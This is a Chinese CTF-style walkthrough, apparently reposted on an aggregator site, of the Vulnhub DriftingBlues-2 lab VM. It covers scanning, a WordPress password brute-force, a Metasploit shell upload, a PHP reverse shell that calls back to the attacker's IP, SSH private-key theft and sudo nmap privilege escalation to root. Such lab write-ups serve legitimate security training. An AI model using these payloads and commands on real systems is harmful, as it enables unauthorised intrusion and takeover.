IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> 看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-2 -> 正文阅读

[网络协议]看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-2

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。

Vulnhub靶机下载:

官网地址:https://www.vulnhub.com/entry/driftingblues-2,634/
在这里插入图片描述
在这里插入图片描述

下载好了把安装包解压 然后试用VMware即可。

Vulnhub靶机漏洞详解:

前言:

这里扫不到靶机 解决方法:

在开机时按下Shift键进入界面*

  • 按e 键,进入该界面
    在这里插入图片描述

  • ro替换为 rw signie init=/bin/bash
    在这里插入图片描述

  • Ctrl键+X键如果没成功说明配置错了需要从新继续配置 如果是下面这个界面说明配置成功。
    在这里插入图片描述

  • 查看 当前网卡IP信息 ip a
    在这里插入图片描述

  • 发现网卡是 ens33 继续编辑网卡配置文件vim /etc/network/interfaces
    在这里插入图片描述

  • 重启网卡: /etc/init.d/networking restart
    在这里插入图片描述
    再次ip a查看 发现有了 然后 进行测试
    在这里插入图片描述

由于我这里DHCP获取到了IP nmap也扫描不了 我改为了NAT模式 但是上面这个是环境的配置方法

①:信息收集:

kali里使用netdiscover发现主机
在这里插入图片描述

渗透机:kali IP :192.168.116.130 靶机IP :192.168.116.129

使用命令:nmap -sS -A -T4 -n 192.168.116.129

在这里插入图片描述

发现开启了三个端口分别是21,22,80 但是这次多了一个端口 21端口 之前没碰到过 所以要留意一下 可以尝试一下匿名登入

ftp 192.168.116.129
用户名:anonymous
密码:空

登入成功后 发现有一张图片 使用get下载 是一张很普通的图片 尝试可能存在 隐写图片 使用binwalk -e 发现没有

在这里插入图片描述
在这里插入图片描述

然后访问一下80端口,使用工具dirb进行扫描 发现了blog 可以提测是博客网站,在网站最下面发现该CMSWordpPress

在这里插入图片描述

在这里插入图片描述

这个 之前DC系列靶机做过的需要修改 hosts 文件 vim /etc/hosts

在这里插入图片描述
使用命令: wpscan --url http://driftingblues.box/blog -e u 再次进行扫描 发现了账号:albert
在这里插入图片描述

②:暴力破解:

使用wpscan进行暴力破解,既然知道了用户是albert 使用命令: 得到密码为:scotland1

wpscan --url http://driftingblues.box/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert

在这里插入图片描述

③:漏洞利用:

方法①:直接打开msfconsole 使用模块:exploit/unix/webapp/wp_admin_shell_upload
在这里插入图片描述
配置如图 但是最后run的时候会显示失败 这也是一种方法 如果上面那种不行可以试一下这个(我这里失败了但不影响!)

在这里插入图片描述

④:反弹shell:

方法②:使用kaili访问 /blog/wp-login.php 输入账号密码 登入成功!!

在这里插入图片描述

在这里插入图片描述

$ip="192.168.116.130";
$port=3333;
$sock=fsockopen($ip, $port);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);

kaili 监听3333端口 然后访问一个不存在的页面反弹shell 反弹成功!!!

http://driftingblues.box/blog/index.php/xxx

在这里插入图片描述
使用命令:python -c 'import pty; pty.spawn("/bin/bash")'

进入home/freddie 发现了一个ssh 私钥文件 进行查看并且复制下来
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

⑤:nmap提权:

现在可以看 user.txt了 找到了第一个flag 这里可以使用nmap 提权(之前DC系列用到过 再做一遍!)

在这里插入图片描述

echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell

在这里插入图片描述

⑥:获取flag:

在这里插入图片描述
至此获取到了所有得flag,渗透测试结束。

Vulnhub靶机渗透总结:

1.解决扫不到靶机的问题(第一次遇到这种情况)
2.学习了wpscan工具的使用
3.msf 使用exploit/unix/webapp/wp_admin_shell_upload模块
4.回顾了nmap提权(这里是看不到输入的 直接打命令就行)
5.这次出现了21 端口匿名登入以及ssh 私钥登入 (新知识点)

最后 自己也会把这系列的靶机继续更新,创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-06-20 23:08:51  更:2022-06-20 23:09:03 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/25 23:49:32-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码